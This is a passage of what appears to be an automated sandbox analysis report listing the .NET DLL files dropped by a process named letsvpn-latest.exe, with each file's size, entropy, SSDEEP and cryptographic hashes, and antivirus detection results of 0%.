                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):24608
                                                                                                                                                                                                  Entropy (8bit):6.744944549827833
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:e/f1IDjV9UPPpWoq3b2KZBZeY8CS+ST6nkI:uf1IDjPOPpWL3qKI3C/mO
                                                                                                                                                                                                  MD5:02D5FC80DC55645778A4D78A24723780
                                                                                                                                                                                                  SHA1:13B2CAB89FF056437287369E1728D64943C71577
                                                                                                                                                                                                  SHA-256:2722C7F315E967D9676CE6B5BEB510D6FCEE0D6F5B05AEE1D69A563071D6E618
                                                                                                                                                                                                  SHA-512:78E6F13C680E883022C09E743253EE7A7ACF8F5C50DD3302D244D95D1E3D58ABC66029083320275D6485AC92F710401A064E1740EB67FE2D2329A2A516252DCD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):103456
                                                                                                                                                                                                  Entropy (8bit):6.150159893883683
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:jrf5GttgxHXEuRmG5rtkGY4CEmWAxXSSYhhS98ca2Wvsd65FJDlGWwkEyB3qKp+g:P5GttWHXEUx5r65LxXshk8JDIWPBoY/9
                                                                                                                                                                                                  MD5:EF4503A4D4843EE0342E775B66597B48
                                                                                                                                                                                                  SHA1:7C32086B782934EE2A1C3D0F87EA99E916CA2C61
                                                                                                                                                                                                  SHA-256:2116A48BEC23CCCC6B993654AD476E1F833F453548CFC209A9F21196BADB6B0B
                                                                                                                                                                                                  SHA-512:A4052E06CE8C17649FEC8B202AC316B9A44C9196BC7B019E1F31052C2AB77E9E338345B42F8A1E5C51278A51B776941261CCE2B0BC66A77EF542ADD8B596CC6B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):163360
                                                                                                                                                                                                  Entropy (8bit):6.226529376890851
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:c4burBkDijpS3+n1Sr5ePVM761+fAwb0A/z:ciikDiw3+1af761+rY+
                                                                                                                                                                                                  MD5:D80339E7A59BA5938DDA47AB253C3F5B
                                                                                                                                                                                                  SHA1:9AF9D1AB6EB6E73ED0E42EC45D76C29BDA7FA5C8
                                                                                                                                                                                                  SHA-256:B649549A1E2A8CD22A14F6202AD80AB30119937CC1D69B2FBDD3D9A1FB37A13E
                                                                                                                                                                                                  SHA-512:126FC5A50D36D7734D2BBCD63703D65720EB7DC0548C8275771EDED722A6F3F26787845F86A2C9D76364E1DEA204750E41140DB5EF714D2A772CCF236CF1267A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):146464
                                                                                                                                                                                                  Entropy (8bit):5.810766544493159
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LSiitDW10Oug94BeCCepM1STU/xnW+W6jfM0amyw0VzGLC1grekKtk0do/9o8afk:uiNang9meCCepM1ST+xnW+W6jfM0amyw
                                                                                                                                                                                                  MD5:CE7AC0EA44FF270ADD7888FE3952A592
                                                                                                                                                                                                  SHA1:9B2193D472191A303B37CD2F0CBA5493E367BE77
                                                                                                                                                                                                  SHA-256:24BD1E22D0F674442D607C0552AC2C3F55EBCE8B3D81D6BD73D244AA2133D5C3
                                                                                                                                                                                                  SHA-512:D4DC9509200BBD00CE2480488C8E4A19CB8DCDEBF7F1B33BBF0A45B1441C2AE3F33EC8CFA374892632E1A8BEB8A7318766750678E97D877295995837DC5883BA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):31776
                                                                                                                                                                                                  Entropy (8bit):6.576538838641731
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:3LNoCdzhFQj/hJTBbGXZDDcULH4JVrwRSgBucQgJa5/Zi/dUDyqz1POMrhq3b2KY:3LqCHmTxGXZDDcULH4JVrwRSgBuvgJad
                                                                                                                                                                                                  MD5:C1994BBFAF6A739406029ED8676659D0
                                                                                                                                                                                                  SHA1:31530C18F2346BCCCE9ED1C78C574CD984C1F6EF
                                                                                                                                                                                                  SHA-256:6DD308156CF036D9972BE22FD6A5BA4767A5C22C9C7DA452F260CE9E0C2A083A
                                                                                                                                                                                                  SHA-512:2FB3FAC797357993D88C282C520D26C2EEB25BE85D82CCA092283E17B47C174DA842AACA8C128BB7C055E57A8020A221EA0EEA9BF340129E8B5ACC19D43E4938
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):34336
                                                                                                                                                                                                  Entropy (8bit):6.562572630329577
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:knD8wecsVygSvqa8ZDPLryER0SO4JVrTYIWUpDkS/Ka5/Bi/W7v4F4zfKwaq3b2U:k7eN4vqa8ZDPLryER0SO4JVrTYIWUpDF
                                                                                                                                                                                                  MD5:C0A30AA26D512873D0B9FEA741870AF1
                                                                                                                                                                                                  SHA1:FD9599E524B3AA48198F0F4D9DF676766ED02F61
                                                                                                                                                                                                  SHA-256:B2AEFFBC045D8B20D4F3F2EC35A16A4F68A1034392DCC22DECAEE814BB600C20
                                                                                                                                                                                                  SHA-512:EBC71E2036F9C84F6214BC4418715C2A7A2B17D00AE7E91FDC5A65BFB26AC21E814362B62D249F0B5BD85FBF4E834204E5FCF5EBD6BFC85F8B6B86D7C6B2BFE6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.951071216277355
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:SN9VWhX3W+hqWOHlLf2KQcvBZ9sGQtS+ShjmM6IGBkSXC:SGbq3b2KZBZZOS+ST6nk1
                                                                                                                                                                                                  MD5:45A59E4D60F6970DCA66AB643AA8C8CD
                                                                                                                                                                                                  SHA1:2A25F0B075E9B39E104B2741A389C820ABE74F70
                                                                                                                                                                                                  SHA-256:FD532F01EC78C8E93AAB9C9349A5106966B3065F42E39989FEC7EB5F15B3293C
                                                                                                                                                                                                  SHA-512:72009C298FEC97ED2142B37D5A5FDFCED65DAAF43FBB45754035CCFD62D0D0F0DB465050B747CAF86223691E49544471FD6DCAB6604D96CF47390186E69D32BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22560
                                                                                                                                                                                                  Entropy (8bit):6.7753295378501
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:kSk7xWUHIx0S3WF7rWthqWOHlLf2KQcvBZ9fGS+ShjmM6IGBkSJ6Z:k/0UHU0SOaq3b2KZBZMS+ST6nkZZ
                                                                                                                                                                                                  MD5:2D864C6E9E03F41D091BDDDD392B38DF
                                                                                                                                                                                                  SHA1:FA367DA623EAA3A114DB0EC35599E63E53A068B3
                                                                                                                                                                                                  SHA-256:D7EA78A691416DCB9BC10A615CA41B13A5F2698DE414E2C80867B6F20B832508
                                                                                                                                                                                                  SHA-512:EE2BCD1D40E111DA22F76331CA1BC2FA48E913DBC2A99CF4DFC28883556B86C7EDB903AFDE8524748804572F6EB6043223A1EB99862F6061E94ECF4CC5A373F0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29216
                                                                                                                                                                                                  Entropy (8bit):6.47574588426455
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:N4QVrxViR9mlxdgq3b2KZBZ6aS+ST6nke:FdxViR9mlxdT3qKsa/mQ
                                                                                                                                                                                                  MD5:C969E3ED73E69BE104174C989080CC51
                                                                                                                                                                                                  SHA1:9CB185BE071F23406E7B961E0996EDC71A61834E
                                                                                                                                                                                                  SHA-256:4AB704100BA1E5248B8E05934AD9597C0F6DA0306E4AE37A8F2F8CFAA48B1921
                                                                                                                                                                                                  SHA-512:8F1DF0B377FC098CD909EE3C28E5AABF441954919AC11AD591E89C5FF2A0EA23637C8537A3528429A9C6DBE376E1A13A68D910AC600486EF6ABAF32D179C4248
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25120
                                                                                                                                                                                                  Entropy (8bit):6.675783274544051
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:tdIaf4rbDyIb/KcWCNRWr7JW/yhqWOHlLf2KQcvBZ9B/MkS+ShjmM6IGBkS5:t+THDHbs6GWGq3b2KZBZokS+ST6nkS
                                                                                                                                                                                                  MD5:D6E4174C9B4EF259C9CB5F37B509F842
                                                                                                                                                                                                  SHA1:2061F234A0004F4A0F17CB41DF611497943CEC05
                                                                                                                                                                                                  SHA-256:579FC3FE3BF74F2F48A2416DE7EE7BF87BF7FBF8749EEBF4D170D51A5F31BD79
                                                                                                                                                                                                  SHA-512:E97DCB302BC88D81A060C5D18024528DA4B3BA696EA082E2C3FFF4298B23A72C2317F51D3A1A073A0878CA293D3D1D8EF2DC17CAF18C60DCA3C0365658E6B81C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):54816
                                                                                                                                                                                                  Entropy (8bit):6.292347937187533
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:Mr59g98C87KHeBUbwgKirbdwMRTzAt9l63qKk/mI8:Mr5HC87rUbwgKirJw1Dl6g/B8
                                                                                                                                                                                                  MD5:33CA4672410B18BB3C83114E36A6B5DC
                                                                                                                                                                                                  SHA1:E2BFF454FFA6C97C9BF5B343708FCD844404BF32
                                                                                                                                                                                                  SHA-256:24352BC45172AADBDC732016CBB57705630CE2B87F50EC915F28DFDE8172B739
                                                                                                                                                                                                  SHA-512:C5C52435F90B9598B901DA27B3E3B95C8E7D2256C8F7944CEAFAE49BD34C3169B16DFFCEEE5056F31AC70272EA4458F870D5D601364E9D7B663BEE631D80E054
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):100896
                                                                                                                                                                                                  Entropy (8bit):6.424195990637689
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:BU2qJ+RazRt/Kc4oJiOxFR4NdJF0/RfhF46HAoYKHgPzpS6w7fa1C9rD3qKi/mt:K2MRtrfrR+Pe/xAiAzpQ7y1C9rDW/W
                                                                                                                                                                                                  MD5:1617B96006C9490C73D574F69FCC5B57
                                                                                                                                                                                                  SHA1:21704ABDD45998D58F106C511C926C697C42320D
                                                                                                                                                                                                  SHA-256:828BA79ADE3358961DD11B11175A9F913E163D711B5C12749D109830FBAF366E
                                                                                                                                                                                                  SHA-512:EE6FF1F39C6E3DFB6F9AD7E9495D5A4C6A46E15D961FB8DFEFC09EAB0FFA6276287B3ABB27D2E08F2271605F365BF99EF00550345F0CFA8E516435E3E8F5CEA2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39456
                                                                                                                                                                                                  Entropy (8bit):6.494502675405848
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:A+meiCyrXOwS8uRssveum1peFLHFBbOBq3b2KZBZ25S+ST6nkj:ryrewFassveuPbBC03qKc/m5
                                                                                                                                                                                                  MD5:EC80554D9363197EBFCE80B8AD93E8BB
                                                                                                                                                                                                  SHA1:661EFC6DBD4F950076F23B41789C38F106953DEA
                                                                                                                                                                                                  SHA-256:CF84E892C469AC8931B7C0DBA290DD35D52340BBEEE669BCC91E9AF638D1AD85
                                                                                                                                                                                                  SHA-512:C2C76C4C5B2474546DDF4F8505E3094E6C2E116FE77A1E1B49BEC7E43643773A75B8262CF8579801F2656C8ADACBD27C33B76B7ABE89ED4614AB0B0143630FFA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):356896
                                                                                                                                                                                                  Entropy (8bit):6.249285614378823
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:VFzzF5VOCxfiKKhsw4NiL0XRzx9WoCklyusCLU:vdfiKI4RzWSyu8
                                                                                                                                                                                                  MD5:C993931B4C49CBB08BE01F5948222C21
                                                                                                                                                                                                  SHA1:AFAFFE49A7709FB0DF1BEB36791A8800153593DB
                                                                                                                                                                                                  SHA-256:0FD8A36F7404D57DC3A3497E42E9ADE20268CDABAE2C481B134FF51555791A0A
                                                                                                                                                                                                  SHA-512:B367F098169A84F29643216E8182277884DB829C1F404BBA4BBC10290BA9FB88B1CC99D0AEC3DEBCF626445E20B8A04C3BF6EC520AB8866C4F417EA3E6F2C489
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):711712
                                                                                                                                                                                                  Entropy (8bit):5.966409790111297
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:ZBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUO:ZBjk38WuBcAbwoA/BkjSHXP36RMGf
                                                                                                                                                                                                  MD5:3B3F8E087FC13A4B7BC9CF7DBBA4ED9B
                                                                                                                                                                                                  SHA1:321E0D0C5C275F2F57AF78BC465535A923D2427C
                                                                                                                                                                                                  SHA-256:AE71F96B5316A5B8EFF90F2DA4C9B55C57FB6A74193F380DEB38E49FE1010DDE
                                                                                                                                                                                                  SHA-512:F823D1460EB52FD039C248E6353587ADB2B78CA9EF988AA9EC7402C428FC3F178D099D5ECD106FDD9E2E051D87DB4A799CD3DE51C402E5C79E5014E6C8C6A6B5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):521760
                                                                                                                                                                                                  Entropy (8bit):6.048533534397053
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:rRKflaWVRA6+LX9c1t3HpbOmhYIeDUQjcaPlq1fQx7NqEaElDp3sL2blV/VyUd93:rRt6+A1pbOsBQAa4f0pWSbb+1ikY
                                                                                                                                                                                                  MD5:F5058D921BF63CBA6CCC215365907B8B
                                                                                                                                                                                                  SHA1:F2085212F559708D955EA7A11D59C974FFA70797
                                                                                                                                                                                                  SHA-256:FF54E93669169BB320F3C9F086EC1E39C9EB26D582D63C1EEF77E5CC8A2801B5
                                                                                                                                                                                                  SHA-512:D85672DD7AD98999B3970190C8DCAF879E2DB1B19762B40712DD125931107F2D2A81911C96F2A01F999BBEE9F68F5EF2C5B7827F4B8B0E365C6B2FD5728B3ADC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):54304
                                                                                                                                                                                                  Entropy (8bit):6.3200343699892345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:e2xghQUndJrmbnJAM6LjB4Mz5k+/FdS0/MuLs/09P2vq3b2KZBZV5SS+ST6nkKe:eGghQaJiFAMAhH/Dw/09Oi3qKVS/mQe
                                                                                                                                                                                                  MD5:FFECD2746B52EC4505805F28242F2369
                                                                                                                                                                                                  SHA1:1DBBA0503D5DC2E24EE7508850911AD1B973AF2B
                                                                                                                                                                                                  SHA-256:054AE39C180EA555CA0834E5C29CFC3F4F3BA034B4EC7E92554BE2109EE29E1B
                                                                                                                                                                                                  SHA-512:C56AD991F652F37C0257B5BE39B88B112ED26BC4EBBC2D3B1E431478A5366A98CB9EA6E641B8D84449DDADB1644538CBCE8FFE789E8AB8E32EF3350BC26C1B17
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):104992
                                                                                                                                                                                                  Entropy (8bit):6.223980748676277
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:ddAKzGN0ifSJxFlm+FpoHloqUIdmJlllf07gllfUzb1kUyN1e/rWhsCMbdynBH3v:dbcl5mJlllf07gllfUzb6W/+b+OHb/b
                                                                                                                                                                                                  MD5:0EA18CFEE679D16BBF6D44C5A7F2ED8F
                                                                                                                                                                                                  SHA1:2C657D4709892B98D5796E644B2F13B568154C7B
                                                                                                                                                                                                  SHA-256:EB5B85284F7C26A7DE75F896CB95A3730253B0D64C1C4A415B10060F2C60CEAE
                                                                                                                                                                                                  SHA-512:A053B405BEE5754E3F0111AAF5CB6866F4D4467B52259D775E61DDC4EEF8A884CD54F3E207BFCC4DA4F548CE25FBFF161080F08604958ECEC3D8CA413E12869B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):49184
                                                                                                                                                                                                  Entropy (8bit):6.266059158176653
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:NqRdL3e5rHMgWVTnyac4oeZrZ3W3qKZy/mb:kdLTtrZ3Wly/8
                                                                                                                                                                                                  MD5:74F34DD4A8A4B1F44B805FDF77CE0C68
                                                                                                                                                                                                  SHA1:E4241F0226EDB1EE78EBCD96049187BFC78E2EFA
                                                                                                                                                                                                  SHA-256:80CE7E9D4F09F73DEC13A550DC31E0EFFA79DD5BA07479954D6CDEBD3B6FD6AA
                                                                                                                                                                                                  SHA-512:A5A0B04A95409A9A04B2DE72F80EC410D5AC26AC46832E5DBE1F8C7A04EC7AD56915A387F3D33E4A3CA014327A1FDEDEAE1958AAF8AE8020CCB3830F68516341
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25120
                                                                                                                                                                                                  Entropy (8bit):6.623339844778744
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:A0w2j7R3d4Q5ENmiL31SAAh1OSxJJssUJIJd4l4Trq3b2KZBZ8wS+ST6nkic3:VLAAh1OSxJJssUJIJal4T23qK5/ml
                                                                                                                                                                                                  MD5:E9BD7AFF9F7F4CE19A15A417937A179B
                                                                                                                                                                                                  SHA1:5189A5770C94648914EC9A44C2C76327291D04B0
                                                                                                                                                                                                  SHA-256:E95310BCE625924484DBD4165C7C0552F01BC6BC0CC6C03A65FB4C40E78D8A09
                                                                                                                                                                                                  SHA-512:D8B21999D1BE9B314962EB14FD37A2CD90661BAFD7974F8B5A25524101CF606C9A72B7BDF59004FD8D5B210CED0F1D130300374AB288ABF38CB95F9F68DCE2E1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.876326631146695
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:d6x4ushqWOHlLf2KQcvBZ9RQa/S+ShjmM6IGBkSZL:dEkq3b2KZBZdS+ST6nkwL
                                                                                                                                                                                                  MD5:C293FE3E2A6D35F139E4992D2E92CB90
                                                                                                                                                                                                  SHA1:65207323C9494A1A07677FCD8444E3A32A8D4D79
                                                                                                                                                                                                  SHA-256:2223DB72D86A4409E1960FFA326DD54FA652EE6F9AFCAA1B2E162E637CAF6228
                                                                                                                                                                                                  SHA-512:ED363E16C85CAF716BBF206D2A487ABEA22FE63CC688CDAE9DAB25B4DB21884FF06196659E5D51B29A351DEF35C4EB24937765B685DDCBD1D5A8FE2DFA1D2BA7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):58400
                                                                                                                                                                                                  Entropy (8bit):6.315564723596698
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:O0GhwEvUmz5IR5tUe9CiXmEkzKeGIsNif11gNsNj8cIjqabZq3b2KZBZwS+ST6nD:MlIR56kCckz2DhiNIchab83qKu/mv8
                                                                                                                                                                                                  MD5:24E728F20D4174E87326141D124D6EEB
                                                                                                                                                                                                  SHA1:65CF7259921B5AAB0CB2CC0BA21A5FE69641C200
                                                                                                                                                                                                  SHA-256:D2D177DDB348675BF28E24C1D5F8925E3BD96AF5365F7E43EACA425F831CAA8C
                                                                                                                                                                                                  SHA-512:6D8B9758AB349AEF0BDAFC645193D50E34B83876BE04A71B96C8D2FEA55FEE2F5E1F243ACBD83AE7A452D7B5A3919E3A9ED416264B188D95B852610604F7919C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.748166697087464
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:daX0gijditBKMBRBHsEQ5hqWOHlLf2KQcvBZ9EpS+ShjmM6IGBkSQ:dakVRiBB83q3b2KZBZIS+ST6nkb
                                                                                                                                                                                                  MD5:08602BC21315B25E97D7E96D8FC2387F
                                                                                                                                                                                                  SHA1:84C18D3E3022FC445F15F4D589A9B9EF64B4CD6B
                                                                                                                                                                                                  SHA-256:48E07F638344EADF87BC216512464EEB05FD5359292F46ADB8F3F8B801A052FB
                                                                                                                                                                                                  SHA-512:7EDC2C8228D54C83D668D5EC9CE525976D9CC4590D7E53C3BC029AE92158A33AEC725C3A5221E5EFBFA3874F3F79918B02F48AB2BD2660B97B24C29B96F88787
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):68640
                                                                                                                                                                                                  Entropy (8bit):6.075654477750361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:Q2UTGlel80eXSfnUnM6sbwXN083qK/D/mT:hlel80eXcU+8n/U
                                                                                                                                                                                                  MD5:C7D493A5DCE0B2C4ECD8EAAB05FEA36D
                                                                                                                                                                                                  SHA1:E139EEC48C6927936E54F4D1F97699448A7E0692
                                                                                                                                                                                                  SHA-256:745A04AFCCC281E483C15F2677AA0FF5D25194C624C293DA9513B0361E6DF50B
